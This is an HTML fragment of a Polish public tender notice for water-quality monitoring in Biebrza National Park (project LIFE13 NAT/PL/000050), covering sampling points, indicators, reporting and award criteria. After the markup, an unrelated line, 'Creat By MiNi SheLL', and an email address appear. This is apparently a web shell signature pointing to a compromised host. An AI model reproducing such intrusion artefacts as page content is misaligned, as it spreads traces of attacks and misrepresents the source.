<b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Zamawiający dopuszcza zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. Warunki zmian zostały opisane przez Zamawiającego we wzorze umowy, stanowiącym załącznik nr 9 (rozdział A) lub załącznik nr 10 (rozdział B) do niniejszej SIWZ.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-03-22</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">12:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17"></span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5"></span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Rodział A Monitoring elementów biologicznych</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>I.	Przedmiotem zamówienia jest pobieranie prób i wykonanie badań laboratoryjnych wraz z opracowaniem wyników w zakresie elementów biologicznych wód powierzchniowych na obszarze Projektu LIFE13 NAT/PL/000050.1.	Monitoring elementów biologicznych prowadzony będzie w 14 punktach pomiarowo-kontrolnych, znajdujących się na następujących ciekach: rzeka Ełk - 4 punkty, rzeka Jegrznia - 2 punkty, Biebrza - 2 punkty, Kanał Kapicki - 2 punkty, Kanał Woźnawiejski - 1 punkt, Kanał Rudzki - 2 punkty, Kanał Kuwaski - 1 punkt. Przybliżoną lokalizację punktów pomiarowo-kontrolnych przedstawia Załącznik nr 15 do SIWZ.2.	Wykaz punktów pomiarowo-kontrolnych i ich opis zamieszczono w Załączniku nr 16 do SIWZ.3.	Pobór próbek wody i materiału biologicznego do badań w zakresie elementów biologicznych będzie prowadzony z częstotliwością 2 razy w roku przez 3 lata wdrażania projektu tj. w latach 2019 - 2021. 4.	Pobór prób wody i materiału biologicznego do badań w ramach zamówienia należy przeprowadzić zgodnie z harmonogramem stanowiącym Załącznik nr 14 do SIWZ. 5.	W ramach badań elementów biologicznych będą badane następujące wskaźniki: fitoplankton, makrofity, fitobentos, makrobezkręgowce bentosowe. Łącznie monitoring elementów biologicznych obejmie 4 wskaźniki. 6.	Analizy laboratoryjne należy wykonać na podstawie metodyk referencyjnych, zgodne z wymaganiami obowiązujących przepisów prawnych. 7.	W ramach zamówienia Wykonawca zobowiązany jest:a)	Do zapewnienia odpowiednich, sterylnych naczyń do poboru prób wody i materiału biologicznego.b)	Do poboru prób wody i materiału biologicznego we własnym zakresie.c)	Zapewnić pobór prób wody i materiału biologicznego w uzgodnionym z Zamawiającym terminie i lokalizacji. d)	Zapewnić transport prób we własnym zakresie i na własny koszt.e)	Do poboru, transportu i przechowywania prób wody i materiału biologicznego zgodnie z wymaganiami dla poboru i przechowywania prób do badań.8.	Każdorazowo termin poboru prób wody i materiału biologicznego będzie uzgadniany z Zamawiającym w celu wydania zezwolenia upoważniającego do przebywania na obszarze Biebrzańskiego Parku Narodowego. Ponadto Biebrzański Park Narodowy wystąpi do Ministerstwa Środowiska o imienne zezwolenia (dla osób, które będą uczestniczyć w wykonaniu zamówienia) na umyślne niszczenie oraz zrywanie lub uszkadzanie makrofitów i chwytanie makrobezkręgowców bentosowych na obszarze Biebrzańskiego Parku Narodowego.9.	Należy wziąć pod uwagę, że obszar objęty pracami jest terenem bagiennym, podmokłym, o podłożu torfowym, a niektóre punkty pomiarowo-kontrolne są zlokalizowane w miejscach trudno dostępnych, gdzie dojść należy pieszo. W czasie prac, ubiór należy dostosować do warunków pogodowych i terenowych (np. czapka, kalosze/wodery, moskitiera).II.	Forma przekazania wyników i organizacja prac1.	Wykonawca zobowiązany jest do przekazania Zamawiającemu sprawozdań w postaci wyników analiz laboratoryjnych z każdego okresu badań. 2.	Wykonawca zobowiązany jest sporządzić raporty roczne o stanie elementów biologicznych jakości wód za lata 2019-2021 (łącznie 3 szt.) oraz jeden raport końcowy o zmianach wartości biologicznych elementów jakości wód powierzchniowych na obszarze Projektu LIFE13 NAT/PL/000050 w latach 2015-2021. W tym celu Zamawiający przekaże raport końcowy z monitoringu elementów biologicznych, który był prowadzony w latach 2015-2018. Raport ten zostanie przekazany Wykonawcy po wykonaniu prac terenowych w 2021 roku.3.	Raport roczny o stanie elementów biologicznych jakości wód należy złożyć w siedzibie Biebrzańskiego Parku Narodowego w Osowcu-Twierdzy. 4.	Roczny raport powinien zawierać:a)	Protokoły z poboru próbek dla każdego punktu pomiarowo-kontrolnego, z dwóch okresów badań. b)	Wyniki analiz z dwóch okresów badań przeprowadzonych w danym roku dla każdego punktu pomiarowo-kontrolnego.c)	Wartości wskaźników jakości wód wchodzących w skład elementów biologicznych (z dwóch okresów badań) należy porównać z wartościami granicznymi klas jakości wód powierzchniowych, uzyskując klasę dla każdego badanego wskaźnika. d)	Wyniki badań w danym punkcie pomiarowo-kontrolnym w danym roku przeprowadzonego badania będą zamieszczone w przygotowanym formularzu stanowiącym Załącznik nr 17 do SIWZ. Formularz z monitoringu wód dla danego punktu pomiarowo-kontrolnego zawierać będzie wyniki badań wskaźników elementów biologicznych z dwóch okresów badań w roku oraz obliczone średnie stężenie w roku. Ostatnia kolumna formularza (granica stanu dobrego) zawierać będzie wartość graniczną danego wskaźnika jakości wód właściwą dla stanu dobrego wód (II klasa). Wartości graniczne muszą być zgodne z zobowiązującymi w Polsce regulacjami prawnymi.e)	Każdy formularz dla danego punktu pomiarowo-kontrolnego zawiera informację z numerem, nazwą, lokalizacją punktu pomiarowo-kontrolnego oraz informacją o osobie dokonującej poboru i wykonania badań. f)	Każda rzeka powinna zostać zakwalifikowana przez Wykonawcę do danego typu abiotycznego rzek, wg. obowiązującego prawa.g)	Raporty roczne powinny dokumentować prace terenowe oraz prace laboratoryjne w formie opisowej, fotograficznej i graficznej. 5.	Raport końcowy powinien zawierać podsumowanie badań biologicznych prowadzonych w latach 2015-2021 na obszarze Projektu LIFE13 NAT/PL/000050. 6.	Raport końcowy o zmianach wartości biologicznych elementów jakości wód powierzchniowych na obszarze Projektu LIFE13 NAT/PL/000050 w latach 2015-2021, należy złożyć do 7 grudnia 2021 r. do siedziby Biebrzańskiego Parku Narodowego w Osowcu-Twierdzy.7.	Każdy raport roczny oraz końcowy należy dostarczyć w formie wydruku oraz na nośniku elektronicznym zapisanym w formacie edytowalnym ,,doc" oraz w formacie ,,pdf". Na stronie tytułowej raportu Wykonawca umieści logo Projektu, logo BbPN, logo mechanizmu finansowego LIFE+, logo Natura 2000 oraz logo NFOŚiGW - logotypy dostarczone przez Zamawiającego. W stopce raportu winny być umieszczone następujące informacje: Opracowanie powstało w ramach projektu LIFE13 NAT/PL/000050 ,,Renaturyzacja sieci hydrograficznej w Basenie Środkowym doliny Biebrzy. Etap II." współfinansowanego przez instrument finansowy LIFE+ Komisji Europejskiej, Narodowy Fundusz Ochrony Środowiska i Gospodarki Wodnej oraz Biebrzański Park Narodowy.8.	Zgodnie z art. 29 ust. 3a ustawy ZamPublUZamawiający nie wymaga zatrudnienia na podstawie umowy o pracę przez Wykonawcę lub Podwykonawcę osób wykonujących prace fizyczne, które są niezbędne do wykonania przedmiotu zamówienia. <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>73111000-3, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2021-12-07<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena ryczałtowa brutto</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin wykonania analiz laboratoryjnych</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Rozdział B Monitoring elementów fizykochemicznych</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>I.	Przedmiotem zamówienia jest pobieranie prób i wykonanie badań laboratoryjnych wraz z opracowaniem wyników w zakresie elementów fizykochemicznych wód powierzchniowych na obszarze Projektu LIFE13 NAT/PL/000050.1.	Monitoring elementów fizykochemicznych prowadzony będzie w 14 punktach pomiarowo-kontrolnych, znajdujących się na następujących ciekach: rzeka Ełk - 4 punkty, rzeka Jegrznia - 2 punkty, Biebrza - 2 punkty, Kanał Kapicki - 2 punkty, Kanał Woźnawiejski - 1 punkt, Kanał Rudzki - 2 punkty, Kanał Kuwaski - 1 punkt. Przybliżoną lokalizację punktów pomiarowo-kontrolnych przedstawia Załącznik nr 15 do SIWZ.2.	Wykaz punktów pomiarowo-kontrolnych i ich opis zamieszczono w Załączniku nr 16 do SIWZ.3.	Pobór próbek wody do badań w zakresie elementów fizykochemicznych będzie prowadzony z częstotliwością 2 razy w roku przez 3 lata wdrażania projektu tj. w latach 2019 - 2021. 4.	Pobór prób wody do badań w ramach zamówienia należy przeprowadzić zgodnie z harmonogramem stanowiącym Załącznik nr 14 do SIWZ. 5.	W ramach badania elementów fizykochemicznych będą badane następujące wskaźniki: temperatura wody, zawiesina ogólna, tlen rozpuszczony, BZT5, ChZT-Mn, ogólny węgiel organiczny, przewodność, substancje rozpuszczone, siarczany, chlorki, wapń, magnez, twardość ogólna, odczyn pH, zasadowość ogólna, azot amonowy, azot Kjeldahla, azot azotanowy, azot ogólny, fosforany, fosfor ogólny. Łącznie monitoring elementów fizykochemicznych obejmie 21 wskaźników.6.	Analizy laboratoryjne należy wykonać na podstawie metodyk referencyjnych, zgodne z wymaganiami obowiązujących przepisów prawnych. 7.	W ramach zamówienia Wykonawca zobowiązany jest:a)	Do zapewnienia odpowiednich, sterylnych naczyń do poboru prób wody.b)	Do poboru prób wody we własnym zakresie.c)	Zapewnić pobór prób wody w uzgodnionym z Zamawiającym terminie i lokalizacji. d)	Zapewnić transport prób we własnym zakresie i na własny koszt.e)	Do poboru, transportu i przechowywania prób wody zgodnie z wymaganiami dla poboru i przechowywania prób do badań.8.	Każdorazowo termin poboru prób wody będzie uzgadniany z Zamawiającym w celu wydania zezwolenia upoważniającego do przebywania na obszarze Biebrzańskiego Parku Narodowego.9.	Należy wziąć pod uwagę, że obszar objęty pracami jest terenem bagiennym, podmokłym, o podłożu torfowym, a niektóre punkty pomiarowo-kontrolne są zlokalizowane w miejscach trudno dostępnych, gdzie dojść należy pieszo. W czasie prac, ubiór należy dostosować do warunków pogodowych i terenowych (np. czapka, kalosze/wodery, moskitiera).II.	Forma przekazania wyników i organizacja prac1.	Wykonawca zobowiązany jest do przekazania Zamawiającemu sprawozdań w postaci wyników analiz laboratoryjnych z każdego okresu badań. 2.	Wykonawca zobowiązany jest sporządzić raporty roczne o stanie elementów fizykochemicznych jakości wód za lata 2019-2021 (łącznie 3 szt.) oraz jeden raport końcowy o zmianach wartości fizykochemicznych elementów jakości wód powierzchniowych na obszarze Projektu LIFE13 NAT/PL/000050 w latach 2015-2021. W tym celu Zamawiający przekaże raport końcowy z monitoringu elementów fizykochemicznych, który był prowadzony w latach 2015-2018. Raport ten zostanie przekazany Wykonawcy po wykonaniu prac terenowych w 2021 roku.3.	Raport roczny o stanie elementów fizykochemicznych jakości wód należy złożyć w siedzibie Biebrzańskiego Parku Narodowego w Osowcu-Twierdzy. 4.	Roczny raport powinien zawierać:a)	Protokoły z poboru próbek dla każdego punktu pomiarowo-kontrolnego, z dwóch okresów badań. b)	Wyniki analiz z dwóch okresów badań przeprowadzonych w danym roku dla każdego punktu pomiarowo-kontrolnego.c)	Wartości wskaźników jakości wód wchodzących w skład elementów fizykochemicznych (z dwóch okresów badań) należy porównać z wartościami granicznymi klas jakości wód powierzchniowych, uzyskując klasę dla każdego badanego wskaźnika. d)	Wyniki badań w danym punkcie pomiarowo-kontrolnym w danym roku przeprowadzonego badania będą zamieszczone w przygotowanym formularzu stanowiącym Załącznik nr 17 do SIWZ. Formularz z monitoringu wód dla danego punktu pomiarowo-kontrolnego zawierać będzie wyniki badań wskaźników elementów fizykochemicznych z dwóch okresów badań w roku oraz obliczone średnie stężenie w roku. Ostatnia kolumna formularza (granica stanu dobrego) zawierać będzie wartość graniczną danego wskaźnika jakości wód właściwą dla stanu dobrego wód (II klasa). Wartości graniczne muszą być zgodne z zobowiązującymi w Polsce regulacjami prawnymi.e)	Każdy formularz dla danego punktu pomiarowo-kontrolnego zawiera informację z numerem, nazwą, lokalizacją punktu pomiarowo-kontrolnego oraz informacją o osobie dokonującej poboru i wykonania badań. f)	Każda rzeka powinna zostać zakwalifikowana przez Wykonawcę do danego typu abiotycznego rzek, wg. obowiązującego prawa.g)	Raporty roczne powinny dokumentować prace terenowe oraz prace laboratoryjne w formie opisowej, fotograficznej i graficznej. 5.	Raport końcowy powinien zawierać podsumowanie badań fizykochemicznych prowadzonych w latach 2015-2021 na obszarze Projektu LIFE13 NAT/PL/000050. 6.	Raport końcowy o zmianach wartości fizykochemicznych elementów jakości wód powierzchniowych na obszarze Projektu LIFE13 NAT/PL/000050 w latach 2015-2021, należy złożyć do 7 grudnia 2021 r. do siedziby Biebrzańskiego Parku Narodowego w Osowcu-Twierdzy.7.	Każdy raport roczny oraz końcowy należy dostarczyć w formie wydruku oraz na nośniku elektronicznym zapisanym w formacie edytowalnym ,,doc" oraz w formacie ,,pdf". Na stronie tytułowej raportu Wykonawca umieści logo Projektu, logo BbPN, logo mechanizmu finansowego LIFE+, logo Natura 2000 oraz logo NFOŚiGW - logotypy dostarczone przez Zamawiającego. W stopce raportu winny być umieszczone następujące informacje: Opracowanie powstało w ramach projektu LIFE13 NAT/PL/000050 ,,Renaturyzacja sieci hydrograficznej w Basenie Środkowym doliny Biebrzy. Etap II." współfinansowanego przez instrument finansowy LIFE+ Komisji Europejskiej, Narodowy Fundusz Ochrony Środowiska i Gospodarki Wodnej oraz Biebrzański Park Narodowy.8.	Zgodnie z art. 29 ust. 3a ustawy ZamPublUZamawiający nie wymaga zatrudnienia na podstawie umowy o pracę przez Wykonawcę lub Podwykonawcę osób wykonujących prace fizyczne, które są niezbędne do wykonania przedmiotu zamówienia. <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>73111000-3, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2021-12-07<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena ryczałtowa brutto</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Liczba elementów fizykochemicznych jakości wód posiadających akredytację</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com